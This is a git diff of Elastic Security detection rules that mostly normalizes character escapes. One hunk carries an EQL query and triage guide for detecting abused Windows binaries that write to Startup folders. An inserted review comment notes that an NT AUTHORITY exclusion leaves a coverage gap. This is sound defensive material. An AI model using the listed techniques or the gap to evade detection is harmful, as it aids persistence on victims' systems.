@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", "references": [ "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" 
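Review bot: The investigation guide on the new side still tells analysts to search for 4624 logon events "to the target host after the registry modification", but this rule's `query` matches `file` events under the Startup folder paths, not registry writes, so that step points investigators at the wrong artifact; it should read `after the file was written to the Startup folder`. The query also drops every writer whose `user.domain` is `NT AUTHORITY`, which means a SYSTEM- or service-context instance of any listed binary writing to the all-users `C:\ProgramData\...\StartUp\` path will not alert; if that exclusion is a deliberate false-positive filter it should be stated in the "False positive analysis" section or in `setup`, otherwise it is a visible coverage gap worth reconsidering. Both points pre-date this commit, which only normalizes the `\u003e` escapes in the `note` to `>`.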
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_102.json b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_102.json index afc03acd6aa..3d731e89b05 100644 --- a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_102.json +++ b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_102.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
@@ -55,7 +55,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_103.json b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_103.json index 3e4b94f7939..8100c09eda1 100644 --- a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_103.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -54,7 +54,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_104.json b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_104.json index 41a4c7e25aa..993416f5436 100644 --- a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_104.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -64,7 +64,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_1.json b/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_1.json index 6bde717c195..0a79dc2645e 100644 
--- a/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_2.json b/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_2.json index 05716d200d1..e6afa1e1ced 100644 --- a/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_2.json +++ b/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_2.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_5.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_5.json index 372176cf8e8..498e0d3b628 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_5.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_5.json 
@@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_6.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_6.json index 80cec9111c9..3f16e59568a 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_6.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_6.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_7.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_7.json index ff00a48d9f0..2f612ce958f 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_7.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_7.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_8.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_8.json index 05b3b70d02c..36e810af3b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_8.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_8.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_9.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_9.json index 77a2960df3e..99fa930e62e 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_9.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_9.json 
@@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_100.json b/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_100.json index 6c9bc561585..3da83e91f54 100644 --- a/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_100.json +++ b/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
diff --git a/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_101.json b/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_101.json index b664b55181e..64fc096bfac 100644 --- a/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_101.json +++ b/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_105.json b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_105.json index e6bcaab7c3f..fe265677506 100644 --- a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_106.json b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_106.json index 3d3a6655625..db2c476e6cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_106.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_107.json b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_107.json index 7daf2902ec2..2b6567d00f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_107.json +++ b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_107.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_105.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_105.json index 91e47ff753c..da8fa789462 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_105.json +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_105.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_106.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_106.json index 84fb91bb4ce..d1480b081d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_106.json +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_106.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_107.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_107.json index 74ffd1ce116..1e70a008ce9 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_107.json 
+++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_107.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_108.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_108.json index 935694a0ef3..16ca1b9ed0e 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_108.json +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_108.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_109.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_109.json index bb254ae4058..06cb6816253 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_109.json +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_109.json 
